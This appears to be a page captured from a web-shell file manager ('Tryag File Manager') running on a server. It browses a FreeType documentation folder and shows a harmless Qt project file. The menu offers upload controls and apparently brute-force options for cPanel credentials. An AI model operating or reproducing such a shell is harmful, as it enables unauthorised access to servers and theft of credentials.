Tryag File Manager
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
usr
/
share
/
doc
/
freetype-devel-2.8
/
tutorial
/
Or
Select Your Path :
Upload File :
New :
File
Dir
//usr/share/doc/freetype-devel-2.8/tutorial/example4.pro
# example4.pro QT += core gui TARGET = example4 TEMPLATE = app SOURCES += example4.cpp MOC_DIR = ./moc LIBS += -lz -lfreetype INCLUDEPATH += $$MOC_DIR \ /usr/local/include \ /usr/local/include/freetype2 # EOF